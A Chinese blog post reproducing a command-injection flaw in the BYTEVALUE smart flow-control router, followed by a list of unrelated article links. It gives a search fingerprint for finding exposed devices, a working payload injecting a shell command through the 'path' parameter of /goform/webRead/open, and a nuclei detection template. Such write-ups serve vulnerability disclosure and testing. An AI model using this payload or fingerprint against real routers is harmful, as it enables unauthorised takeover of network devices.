当前位置: 首页 > news >正文

【漏洞复现】BYTEVALUE智能流控路由器存在命令执行

【漏洞介绍】

百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。

【指纹】

title=”BYTEVALUE 智能流控路由器”

【UI】

【payload】

/goform/webRead/open/?path=|whoami

【Poc】

id: BYTEVALUE-Rce
info:name: BYTEVALUE-Rceauthor: BYTEVALUE-Rceseverity: criticaltags: BYTEVALUEhttp:- raw:- |GET /goform/webRead/open/?path=|whoami HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedmatchers-condition: andmatchers:- type: wordwords:- "admin"- type: statusstatus:- 200

【使用nuclei复现】

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • DAY50 309.最佳买卖股票时机含冷冻期 + 714.买卖股票的最佳时机含手续费
  • with contextlib.suppress(ValueError)临时抑制指定的异常
  • LeetCode 17. 电话号码的字母组合 中等
  • 后端架构选择:构建安全强大的知识付费小程序平台
  • STM32C8T6实现微秒延时函数delay_us
  • linux rsyslog三种远程转发配置方式
  • Failed to connect to github.com port 443:connection timed out
  • BI 数据可视化平台建设(1)—交叉表组件演变实战
  • 8255 boot介绍及bring up经验分享
  • python---数据库操作
  • Tensorflow中的张量操作
  • Spring依赖注入与控制反转
  • 设计模式-迭代器模式(Iterator)
  • xss 盲打
  • 大语言模型的关键技术
  • [case10]使用RSQL实现端到端的动态查询
  • 【162天】黑马程序员27天视频学习笔记【Day02-上】
  • 【跃迁之路】【463天】刻意练习系列222(2018.05.14)
  • android高仿小视频、应用锁、3种存储库、QQ小红点动画、仿支付宝图表等源码...
  • co模块的前端实现
  • IDEA常用插件整理
  • Mithril.js 入门介绍
  • React组件设计模式(一)
  • SegmentFault 2015 Top Rank
  • Spring Cloud Alibaba迁移指南(一):一行代码从 Hystrix 迁移到 Sentinel
  • 阿里云Kubernetes容器服务上体验Knative
  • 基于遗传算法的优化问题求解
  • 讲清楚之javascript作用域
  • 力扣(LeetCode)357
  • 那些被忽略的 JavaScript 数组方法细节
  • 时间复杂度与空间复杂度分析
  • 为物联网而生:高性能时间序列数据库HiTSDB商业化首发!
  • ‌JavaScript 数据类型转换
  • # Redis 入门到精通(九)-- 主从复制(1)
  • # 消息中间件 RocketMQ 高级功能和源码分析(七)
  • #pragma pack(1)
  • #pragma 指令
  • #在 README.md 中生成项目目录结构
  • $con= MySQL有关填空题_2015年计算机二级考试《MySQL》提高练习题(10)
  • $NOIp2018$劝退记
  • (1)安装hadoop之虚拟机准备(配置IP与主机名)
  • (13)[Xamarin.Android] 不同分辨率下的图片使用概论
  • (Java实习生)每日10道面试题打卡——JavaWeb篇
  • (react踩过的坑)antd 如何同时获取一个select 的value和 label值
  • (补充)IDEA项目结构
  • (二开)Flink 修改源码拓展 SQL 语法
  • (每日一问)计算机网络:浏览器输入一个地址到跳出网页这个过程中发生了哪些事情?(废话少说版)
  • (三分钟)速览传统边缘检测算子
  • (算法)N皇后问题
  • (原創) X61用戶,小心你的上蓋!! (NB) (ThinkPad) (X61)
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .net core 外观者设计模式 实现,多种支付选择
  • .NET_WebForm_layui控件使用及与webform联合使用
  • .NET4.0并行计算技术基础(1)
  • .net6 当连接用户的shell断掉后,dotnet会自动关闭,达不到长期运行的效果。.NET 进程守护